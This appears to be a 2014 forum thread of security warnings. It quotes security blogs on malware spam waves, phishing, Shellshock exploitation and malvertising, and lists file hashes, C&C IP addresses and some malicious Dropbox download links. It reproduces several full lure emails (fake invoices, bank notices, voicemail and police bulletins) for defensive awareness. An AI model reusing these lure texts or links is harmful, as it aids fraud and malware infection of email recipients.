184.154.253.181: https://www.virustotal.com/en/ip-address/184.154.253.181/information/
81.88.48.71: https://www.virustotal.com/en/ip-address/81.88.48.71/information/
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
___

Fake Order SPAM
- http://myonlinesecurity.co.uk/order-statsus-order-confirmation-9618161864-malware/
29 Sep 2014 - "'Order statsus: Order confirmation: 9618161864' coming from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Lots of different subjects for this email . All subjects have a random number involved and some have bad spelling mistakes, including:
- Order statsus: Order confirmation: 9618161864
- Order info: 32257958734
- Payment status: 93612666937
- Payment info: 21714421631
- Payment confirmation: 27863161481
The email looks like ( slightly different versions all with different names and phone numbers and companies):
Greetings,
Your order #9618161864 will be shipped on 01.10.2014.
Date: September 29, 2014. 12:12pm
Price: £156.77
Transaction number: 9AECB76F37D22F21
Please find the detailed information on your purchase in the attached file order_2014_09_29_9618161864.zip
Kind regards,
Sales Department
Tiana Haggin ...

Date: order_2014_09_29_9618161864.zip: Extracts to: sale_2014_09_29_73981861092.exe
Current Virus total detections: 3/55* . This 'Order statsus: Order confirmation: 9618161864' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign icon, that makes you think it is a proprietary invoice instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/23a77e612c3f1b44ab4c440354efe3e4867eacb20c53a06a449986f1186e715d/analysis/1411991708/
... Behavioural information
TCP connections
213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
23.62.99.24: https://www.virustotal.com/en/ip-address/23.62.99.24/information/
213.186.33.4: https://www.virustotal.com/en/ip-address/213.186.33.4/information/
___

More Fake Voicemail SPAM - fake wav malware
- http://myonlinesecurity.co.uk/new-voicemail-message-suy-301-fake-wav-malware/
29 Sep 2014 - "'New Voicemail Message SUY-301' coming form random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
The Voice Mail message has been uploaded to the following web
address ...
You can play this Voice Mail on most computers.
Please do not reply to this message. This is an automated message which
comes from an unattended mailbox.
This information contained within this e-mail is confidential to, and is
for the exclusive use of the addressee(s).
If you are not the addressee, then any distribution, copying or use of this
e-mail is prohibited.
If received in error, please advise the sender and delete/destroy it
immediately.
We accept no liability for any loss or damage suffered by any person
arising from use of this e-mail.

... the link in the email is broken because the idiots who crafted the email messed up, the formatting. There are literally hundreds of these emails and almost all of them have a different link address and a different set of letters and numbers...
29 September 2014: voice448705888444.zip: Extracts to: voice448705888444.scr
Current Virus total detections: 1/55* . This 'New Voicemail Message SUY-301' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4c622342a2b88e89827f4f020d05c4a622c6768ead460bc1d0ec9ce36b3a4ecb/analysis/1412003182/
___

'Mailbox Has Exceeded The Storage Limit' - Phish ...
- https://blog.malwarebytes.org/fraud-scam/2014/09/your-mailbox-has-exceeded-the-storage-limit-phish/
Sep 29, 2014 - "Be wary of emails claiming you’ve gone over your email storage limit – users of both AOL and Outlook are reporting the following poorly written message crashing their mailbox party in the last couple of days:
“Kindly Re-Validate Your Mailbox
Your mailbox has exceeded the storage limit is 1 GB, which is defined by the administrator, are running at 99.8 gigabytes, you can not send or receive new messages until you re-validate your mailbox.
To renew the mailbox,
click link below: [removed]
Thank you!
Web mail system administrator!
WARNING! Protect your privacy. Logout when you are done and completely
exit your browser.”

The URL given on the Facebook post is already -dead- but it’s likely the people behind this have mails targeting other types of account and deploying multiple phish page links. In both examples, the scammers are using free AOL mail addresses – despite claiming to be from 'The Outlook Team' – which should raise a few red flags. AOL have confirmed the mail is a -hoax- and recipients should safely deposit it in their Trash folder..."
___

Bash Bug vulnerability
- http://www.symantec.com/connect/blogs/shellshock-all-you-need-know-about-bash-bug-vulnerability
Updated: 29 Sep 2014 - "... There are limited reports of the vulnerability being used by attackers in-the-wild. Proof-of-concept scripts have already been developed by security researchers. In addition to this, a module has been created for the Metasploit Framework, which is used for penetration testing...
How a malicious command can be tacked-on to the end of a legitimate environment variable. Bash will run the malicious command first
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/shellshock-command-diagram-600px_v2.png
... Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available..."

Table of C&C Servers:
- http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/Table-01.jpg

89.238.150.154: https://www.virustotal.com/en/ip-address/89.238.150.154/information/
108.162.197.26: https://www.virustotal.com/en/ip-address/108.162.197.26/information/
162.253.66.76: https://www.virustotal.com/en/ip-address/162.253.66.76/information/
213.5.67.223: https://www.virustotal.com/en/ip-address/213.5.67.223/information/

:fear: :mad:

FYI...

Fake NatWest, new FAX SPAM
- http://blog.dynamoo.com/2014/09/malware-spam-natwest-you-have-new.html
30 Sep 2014 - "The daily mixed spam run has just started again, these two samples seen so far this morning:

NatWest: "You have a new Secure Message"
From: NatWest [secure.message@ natwest .com]
Date: 30 September 2014 09:58
Subject: You have a new Secure Message - file-3800
You have received a encrypted message from NatWest Customer Support
In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
Please download your ecnrypted message at ...

"You've received a new fax"
From: Fax [fax@victimdomain .com]
Date: 30 September 2014 09:57
Subject: You've received a new fax
New fax at SCAN4148711 from EPSON by https ://victimdomain .com
Scan date: Tue, 30 Sep 2014 14:27:24 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...

The link in the email goes through a script to ensure that you are using a Windows PC and then downloads a file document3009.zip which contains a malicious executable document3009.scr which has a VirusTotal detection rate of 3/54*. The Comodo CAMAS report and Anubis report are rather inconclusive."
* https://www.virustotal.com/en/file/1b09eaabd81bb0a64dc297e1d8fbbde5892e97e43c1fcec237d9f4a4eaf0c566/analysis/1412070442/
... Behavioural information
DNS requests
maazmedia .com (69.89.22.130)
TCP connections
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
69.89.22.130: https://www.virustotal.com/en/ip-address/69.89.22.130/information/
___

Fake Delta Air SPAM - word doc malware
- http://myonlinesecurity.co.uk/delta-air-thank-order-fake-word-doc-malware/
30 Sep 2014 - "'Delta Air Thank you for your order' being sent to bookings@ uktservices .com and BCC copied to you pretending to come from Delta Air <login@ proche-hair .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Order Notification,
E-TICKET NUMBER / ET-98191471
SEAT / 79F/ZONE 1
DATE / TIME 2 OCTOBER, 2014, 11:15 PM
ARRIVING / Berlin
FORM OF PAYMENT / XXXXXX
TOTAL PRICE / 214.61 GBP
REF / OE.2368 ST / OK
BAG / 3PC
Your electronic ticket is attached to the letter as a scan document.
You can print your ticket.
Thank you for your attention.
Delta Air Lines.

30 September 2014: ET-17843879.zip: Extracts to: DT-ET_5859799188.exe
Current Virus total detections: 4/55* . This 'Delta Air Thank you for your order' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/3761b84ab4ee6bded5fd2ed4717d84f73e749d733a2d8bb3765d62e0c4d9fd53/analysis/1412075964/

:fear: :mad:

FYI...

Fake Police 'Suspect' SPAM
- http://blog.dynamoo.com/2014/10/homicide-suspect-important-spam.html
1 Oct 2014 - "... the New York City police have finally tracked me down for eviscerating that spammer in Times Square.
From: ALERT@ police .uk [ALERT@ police-uk .com]
Date: 1 October 2014 08:49
Subject: Homicide Suspect - important
Bulletin Headline: HOMICIDE SUSPECT
Sending Agency: New York City Police
Sending Location: NY - New York - New York City Police
Bulletin Case#: 14-49627
Bulletin Author: BARILLAS #1264
Sending User #: 56521
APBnet Version:
The bulletin is a pdf file. To download please follow the link below ...

Weirdly, the message comes from a police .uk email address and the link goes to a driving school in Australia. And it comes from 63.234.220.114 which is an IP address in Kansas City. Perhaps the biggest anomaly is the file that is downloaded, a ZIP file called file-viewonly7213_pdf.zip which contains an executable file-viewonly7213_pdf.scr which is (as you might guess) malicious with a VirusTotal detection rate of 2/55*. The Anubis report** shows that the malware phones home to santace .com which is probably worth blocking or monitoring. Other analyses are pending. I've also seen the same payload promoted through a "You've received a new fax" spam, and no doubt there will be others during the course of the day."
* https://www.virustotal.com/en/file/5e856b114844e8fadb5386403f9616c57b26562d5e1b78570a0525699474d738/analysis/1412150049/

** https://anubis.iseclab.org/?action=result&task_id=176a536785d2b80f411e27a2c10ba7dda&format=html
___

Something evil on 87.118.127.230
- http://blog.dynamoo.com/2014/10/something-evil-on-87118127230.html
1 Oct 2014 - "... what exploit kit this is I cannot determine, but there's something evil on 87.118.127.230 (Keyweb, Germany) which is using hijacked GoDaddy-registered subdomains to distribute crap. It's definitely worth -blocking- this IP. The source looks like some sort of malvertising, but I have incomplete data..."

87.118.127.230: https://www.virustotal.com/en/ip-address/87.118.127.230/information/
___

Fake 'Booking Cancellation' SPAM
- http://blog.dynamoo.com/2014/10/uktservicescom-booking-cancellation.html
1 Oct 2014 - "... a -mass- of these purporting to be from uktservices .com ("UK Travel Services"), but in fact it is a -forgery- and does -not- come from them at all - they are -not- responsible for sending the spam and their systems have -not- been compromised.
From: email@ uktservices .com
Date: 1 October 2014 14:01
Subject: Booking Cancellation
Hello.
Your booking at 13:15 on 1st Oct 2014 has been Cancelled.
Here is a link to your updated bookings view...

All the emails are somewhat mangled, but the first link in the email (not the uktservices .com link) goes to what appears to be an exploit kit... In -all- cases, those pages forward to a malicious page at: [donotclick]37.235.56.121 :8080/njslfxqqw9. The IP of 37.235.56.121 belongs to EDIS GmbH in Austria, and I suspect it has been hacked through an insecure Joomla installation. I haven't been able to identify which exploit kit it is as it it has been hardened against analysis, but you can guarantee that this -is- malicious in some way or another..."

37.235.56.121: https://www.virustotal.com/en/ip-address/37.235.56.121/information/
___

More Fake Invoice SPAM
- http://myonlinesecurity.co.uk/invoice-08387-digital-fake-pdf-malware/
1 Oct 2014 - "'Invoice 08387 from Them Digital' pretending to come from Jason Willson <jason@ themdigital .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/them_digital_email.png

There are actually about 15 different sizes and repackaged versions of this malware that I have seen so far today. All have the same zip file name but the contents inside are named differently, Some will be caught by antivirus generic detections and some won’t, so be careful & watch out. Use your eyes and intuition and don’t rely on yoiur antivirus to protect you from these types of malware
Todays Date: Them Digital Invoice 08387.pdf.zip: Extracts to: ThemDigital_Invoice_42559029506452623.pdf.exe | Current Virus total detections: 9/55**. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/620ee072d3262102bd38c008fcf5a03ab44748d0f2cf6621079b768b1c7a89fc/analysis/1412153387/
___

Fake 'Cashbuild Copied invoices' SPAM - PDF malware
- http://myonlinesecurity.co.uk/cashbuild-copied-invoices-fake-pdf-malware/
1 Oct 2014 - "'Cashbuild Copied invoices' pretending to come from billing@ cashbuild .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

get copies of invoices. We will not be able to pay them. Please send clear invoices

1 October 2014: copies_908705.zip ( 10kb): Extracts to: copies_908705.exe
Current Virus total detections: 0/55* This Cashbuild Copied invoices is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/80261645578f003d9961e1dd9438b27ee4bc14d27cf76bf8ab52db7f2f785961/analysis/1412156828/
___

GNU bash vulns...
- http://www.securitytracker.com/id/1030890
Updated: Oct 3 2014*
Original Entry Date: Sep 24 2014
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6277 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6278 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187 - 10.0 (HIGH)
* ... archive entries have one or more follow-up message(s)...
___

DoubleClick abused - malvertising
- https://blog.malwarebytes.org/malvertising-2/2014/09/googles-doubleclick-ad-network-abused-once-again-in-malvertising-attacks/
30 Sep 2014 - "Last week we uncovered a large-scale malvertising* attack involving Google’s DoubleClick and Zedo that affected many high-profile sites**... another incident where DoubleClick is part of the advertising chain has happened again... the publisher is trusting them to only allow ‘clean’ ads. Many popular sites were caught in the cross-fire including examiner . com... they can be widespread in an instant by leveraging the advertising networks’ infrastructure. Malicious ads are displayed to millions of visitors who do -not- actually need to click them to get infected:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/overview.png
... Flash-based redirection: ad looks legit but hides a silent -redirection- to an exploit page. Once again, no user interaction is required to trigger the -redirection- and anyone running an outdated Flash plugin is at risk of getting exploited... It is the infamous CryptoWall*** (hat tip @kafeine) ransomware that encrypts your files and demands a ransom..."
* https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/

** https://blog.malwarebytes.org/exploits-2/2014/09/malvertising-hits-the-times-of-israel-newspaper/

*** https://www.virustotal.com/en/file/5378fdfdbbb87695d334c13b0b035d260a5934c071849ee000beec59c3ac7c26/analysis/1412048718/

:mad: :fear:

FYI...

Fake Invoice SPAM - XLS malware
- http://myonlinesecurity.co.uk/invoice-ids107587_815-fake-xls-malware/
2 Oct 2014 - "'Invoice IDS107587_815' pretending to come from billing department at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Invoice-IDS107587_815.png

This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
___

Fake lawyer SPAM - PDF malware
- http://myonlinesecurity.co.uk/document-lawyer-fake-pdf-malware/
2 Oct 2014 - "'document from lawyer' pretending to come from random names at yahoo .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... There are a multitude of similar type subjects with this one including:
document from lawyer
resend the fax
document’s from lawyer
document review
notarized document from lawyer

The document from lawyer email is very plain and simple and has a very simple 2 or 3 word content in bold: 'Document Review Lawyer' or document 'review consultant' or 'The law firm' and it attaches a file that pretends to be a copy of a fax...
2 October 2014: facsimile_page2_10.02.2014.zip: Extracts to: facsimile_page2_10.02.2014.exe
Current Virus total detections: 5/55* . This 'document from lawyer' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/41cf7ad7f6090e20412f05ef92b7b6a91499190a4ef4bc01fc52aac6cc7ed036/analysis/1412241170/
___

Fake 'Shipping' SPAM - .scr malware
- http://myonlinesecurity.co.uk/po-94864-pm-shipping-malware/
2 Oct 2014 - "'PO-94864-PM Shipping' pretending to come from somebody called Leta Potts is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has 2 different versions of the text, depending on whether you read emails in full html when they can show pictures and formatting or in plain text... The email plain text version looks like:
Hi April,
PO-61814-PM is ready to ship. Attached please find the receipt and UPS tracking is below.
UPS Tracking Number: 1ZY79R600397981039
Thank you and have a wonderful afternoon.
Amy Fling
Pro Shoe Covers
503-807-1642
800-978-1786
www. ProShoeCovers .com
129 Pendleton Way, #31
Washougal, WA 98671
OMWBE Certified
Women’s Business Enterprise ...

The html version looks like:
April,
Please see attached draw. Thanks
Leta Potts
Conquest Electrical Contracting, LLC
Owner/Operator
12307 Roxie Drive, Ste. 215
Austin, TX 78729
Cell 925 487-5121
Office 925 524-2651 ...

2 October 2014: docs100214.zip - Extracts to: mydocs.scr
Current Virus total detections: 0/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a icon of a blue folder with a silver key instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f512adf0abfa86ce39d355b5c5f44be91d88012e9c3d6c2541d22c902eab4576/analysis/1412253608/

- http://www.ehow.com/info_8510148_scr-file.html
"... Viruses and other malicious software may be installed in SCR files, as the file type is -executable- or capable of installing code..."
___

Fake insurance photos SPAM - malware
- http://myonlinesecurity.co.uk/fwd-photos-insurance-company-malware/
2 Oct 2014 - "'Fwd: Photos from the insurance company' coming from random names ands email addresses, most pretending to come from somebody @ntlworld .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email has a totally -blank- body with just the attachment named photo1.zip and subject of Fwd: Photos from the insurance company . It is exactly the -same- malware as in today’s document from lawyer* – fake PDF malware but instead of a fake fax it unzips to a pif file ( windows shortcut). This Fwd: Photos from the insurance company is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/document-lawyer-fake-pdf-malware/
___

Fake 'eDocument' SPAM – PDF malware
- http://myonlinesecurity.co.uk/santander-new-edocument-arrived-fake-pdf-malware/
2 Oct 2014 - "'New eDocument arrived' pretending to come from e-Documents@ santander .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/santander_statement.png

... the malware is the -same- as in today’s 'document from lawyer'* – fake PDF malware. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/document-lawyer-fake-pdf-malware/
___

O/S Market Share - Sep 2014:
- http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0
['Still more XP users than Vista, Win8, and Win8.1 combined]
___

Fake invoice SPAM
- http://blog.mxlab.eu/2014/10/02/fake-email-regarding-outstanding-amount-contains-trojan/
2 Oct 2014 - "... intercepted 2 trojan distribution campaigns by email.
Unpaid invoice notification
The first campaign has the following details:
[IMPORTANT] Unpaid invoice notification
[IMPORTANT] Latest letter on invoice overdue
Final letter before commencing legal action
Latest invoice
Latest letter on invoice overdue
Recent invoice

This email is sent from a spoofed addresses and has the following body below. In the email, the amount that is due is specified in the GBP currency but no company or service is included in the message...
We are writing to you about fact, despite previous reminders, there remains an outstanding amount of GBP 234.60 in respect of the invoice(s) contained in this email . This was due for payment on 26 September, 2014.
Our credit terms stipulate full payment within 3 days and this amount is now 14 days overdue.The total amount due from you is therefore GBP 340.51
If the full amount of the sum outstanding, as set above, is not paid within 7 days of the date of this email, we shall begin legal action, without warning, for a court order requiring payment. We may also commence insolvency proceedings. Legal proceedings can affect any credit rating. The costs of legal proceedings and any other amounts which the court orders must also be paid in addition to the debt.
This letter is being sent to you in accordance with the Practice Direction on Pre-Action Conduct (the PDPAC) contained in the Civil Procedure Rules, The court has the power to sanction your continuing failure to respond.
You can find the original invoice in attachment below...

The attached ZIP file name is in the format like Copy4167506/9332.zip and contains the 89 kB large file Invoice_815992488951.xls.scr. The trojan is known as HEUR/QVM20.1.Malware.Gen. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total*...
* https://www.virustotal.com/en/file/e09375d8ce97b76df1d2037a7f9511d5035a1bc35e87568995721349513386c7/analysis/1412243475/

The 2nd campaign has the following details: This email is sent from the spoofed addresses like “Harrison Andrews , Billing Dept” <049aaa@***** .pl> and has the following body:
This email contains an invoice ID:P198150_874 file attachment.
Yours faithfully,
Harrison Andrews , Department CCD

The attached ZIP file name is in the format like P198150_874.zip and contains the 89 kB large file Invoice_33618247236242544.xls.scr. The trojan is known as HEUR/QVM20.1.Malware.Gen. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total**..."
** https://www.virustotal.com/en/file/31ff7ccaae4f3fe15df8d52fe18e9017888ae13877eefbf9314e6d76cb32cefa/analysis/

:mad: :fear:

FYI...

Fake 'Transactions Report' SPAM - fake PDF malware
- http://myonlinesecurity.co.uk/alert-transactions-report-users-2014-09-28-2014-09-28-fake-pdf-malware/
3 Oct 2014 - "'Alert Transactions Report by users from 2014-09-28 to 2014-09-28' pretending to come from Tech Server is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email is very terse and basic with a simple one line content:

Your requested report is attached here...

3 October 2014: transact_store.zip: Extracts to: transact_e5ebfdsd621.exe
Current Virus total detections: 2/54* . This is the same malware that is being dropped by today’s version of http://myonlinesecurity.co.uk/new-photo-malware/
This 'Alert Transactions Report by users from 2014-09-28 to 2014-09-28' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e836820d947de6da456a61b37f9c9cdf749a61211b52a51a2aef0aab5786239f/analysis/1412331282/
___

Fake 'shopping' malSPAM spreads via Dropbox
- http://blog.dynamoo.com/2014/10/thanks-for-shopping-with-us-today.html
3 Oct 2014 - "This spam email leads to malware hosted on Dropbox:
From: pghaa@ pghaa .org
To: victim@ victimdomain .com
Date: 3 October 2014 11:43
Subject: victim@ victimdomain .com
Thanks for shopping with us today! Your purchase will be processed shortly.
ORDER DETAILS
Purchase Number: CTV188614791
Purchase Date: 7:38 2-Oct-2014
Customer Email: victim@ victimdomain .com
Amount: 4580 US Dollars
Open your payment details
Please click the link provided above to get more details about your order...

In this case the download location is https ://www .dropbox .com/s/7n4ib0ysqnzr4un/Payment%20Details_52375.zip?dl=1 although it is likely that there are others. The download file is Payment Details_52375.zip containing a malicious executable PAYMENT DETAILS.PDF .scr_56453.exe which has a VirusTotal detection rate of 5/55*. At the moment, automated analysis tools are inconclusive as to what it does.
UPDATE: it is also being distributed via
[donotclick]
https ://www .dropbox .com/s/9an3ggp98xu7ql5/Transaction_85523.zip?dl=1
https ://www .dropbox .com/s/8uoheamseo98nse/Information_J90Z4.zip?dl=1"
* https://www.virustotal.com/en-gb/file/7b255b6d648f670bd7ecbae80983230fedbce13cfcf2e93a0887fba53b5c42ad/analysis/1412334793/
___

Fake 'Personal reply' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/re-personal-reply-id-509359-word-doc-malware/
3 Oct 2014 - "'Re: Personal reply id 509359' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Office_macro.png

3October 2014: Reply02.doc . Current Virus total detections: 4/55*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustotal.com/en/file/75fda9cc7d62d11e88ddfae10b094af5a46b87a838bbe45954cdb3c27d098b73/analysis/1412314059/
___

Fake 'Adobe invoice' SPAM...
- http://blog.mxlab.eu/2014/10/02/malicious-adobe-invoice-doc-attached-to-fake-emails-adobe-creative-cloud-service-invoice/
Oct 2, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Adobe Invoice”. This email is send from the spoofed address “Adobe Billing <billing@ adobe .com>” and has the following body:
Dear Customer,
Thank you for signing up for Adobe Creative Cloud Service.
Attached is your copy of the invoice.
Thank you for your purchase.
Thank you,
The Adobe Team
Adobe Creative Cloud Service

Screenshot: http://img.blog.mxlab.eu/2014/20141002_adobe.gif

The attached file is 42 kB large and has the name Adobe Invoice.doc. The trojan is known as W97M.Dropper.F, VBA/TrojanDownloader.Agent.AZ, MSOffice/Agent!tr or Win32.Trojan.Macro.Dxmz. At the time of writing, 4 of the 55 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/55f06751b22dd5c17bcce7ab9e9da59dcabd3840ab089fe8b800c8aebbf1f3f5/analysis/
___

Shellshock in-the-wild - drops malware
- http://community.websense.com/blogs/securitylabs/archive/2014/10/01/malware-in-the-wild-abusing-shellshock-vulnerability.aspx
1 Oct 2014 - "Since the Shellshock vulnerability became public knowledge... vulnerability being exploited in the wild to drop malware...
Backdoors and Bot Nets: The observed malware found to be exploiting the Shellshock vulnerability has been dropped by various command and control (C&C) servers... The malware has the following capabilities:
- A Linux backdoor, capable of DDoS attacks, brute force attacks on passwords, and receiving commands to execute from its C&C server.
- A Perl IRC bot, typically capable of DDoS attacks and spreading itself by looking for exploitable servers using various vulnerabilities, such as remote file inclusion exploits.
The malware has been seen to be downloaded to a compromised machine by exploiting the Shellshock vulnerability and invoking commands such as "curl" or "wget," and then executing the malicious payload. To date, we have seen -4- variants of the Linux backdoor and several versions of the Perl-based IRC bot.
Popularity Since Vulnerability Disclosure: The following domains and IPs have been found to be used as command & control (C&C) points for this campaign (amongst others):
208.118.61.44: https://www.virustotal.com/en/ip-address/208.118.61.44/information/
27.19.159.224: https://www.virustotal.com/en/ip-address/27.19.159.224/information/
89.238.150.154: https://www.virustotal.com/en/ip-address/89.238.150.154/information/
212.227.251.139: https://www.virustotal.com/en/ip-address/212.227.251.139/information/
... We have seen C&C traffic to these IPs in the last 2 -months- showing that they have been used for malicious and bot network campaigns -prior- to the Shellshock vulnerability disclosure. In fact, going back as far as 2012, we see that one such C&C was used in a Point-of-Sale malware campaign known as 'vSkimmer'. More recently, we have observed it serving up an IRC bot... Experience has taught us that as cyber-criminals zoom in on the vulnerable code branch, -additional- vulnerabilities are likely to surface..."

- http://atlas.arbor.net/briefs/index#1914014714
Extreme Severity
3 Oct 2014

:fear::fear: :mad:

FYI...

Fake Western Union invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/western-union-invoice-5751107-october-fake-pdf-malware/
6 Oct 2014 - "'invoice 5751107 October' pretending to come from Western Union Inc and quite a few others coming from a random single name like Amelia, Fred, John etc at random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
Please find attached your October invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 8017730 Account No 5608017730.
Thanks very much
Western Union Inc. 2014 @ All rights reserved.

The earlier email looks like:
Please find attached your October invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 5751107 Account No 5605751107.
Thanks very much
Amelia ...

6 October 2014: invoice_5751107.zip: Extracts to: invoice.0914.1602783433405300232.exe
Current Virus total detections: 9/55* . This invoice 5751107 October pretending to come from Western Union is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ce97ddc450b4aefc33e279992c2a201297d74eb56ff98f8ed188fa2c0990485b/analysis/1412589518/
___

Fake Bank confirmation SPAM - PDF malware
- http://myonlinesecurity.co.uk/chen-young-bank-swift-fake-pdf-malware/
6 Oct 2014 - "'CHEN YOUNG BANK SWIFT' pretending to come from CHEN YOUNG is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Hello,
My bank have made the payment and the funds will arrive your bank in 3 days time. Attached is the bank confirmation Swift, let me know if your bank details are ok in the SWIFT
Thank you!
Chen Young
Branch Manager
YangZhou Wells Imp&Exp Co., Ltd
9-525 Modern Square,
Wenhui West Road
Yangzhou, Jiangsu. CHINA
Fax: 0086 514 8795 1721 / 0086 514 8795 1752

6 October 2014: SWIFT_0000019989399188321110000011.zip:
Extracts to: SWIFT_000001998939918835961163324799.exe
Current Virus total detections: 9/55* . This 'CHEN YOUNG BANK SWIFT' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ff424a01fd1a1f3fd0bb50704d16cd8fe63f7d4136b2df4bf6b8924bace8c979/analysis/1412582411/
___

Fake Tiffany invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/tiffany-invoice-copy-waiting-confirmation-fake-pdf-malware/
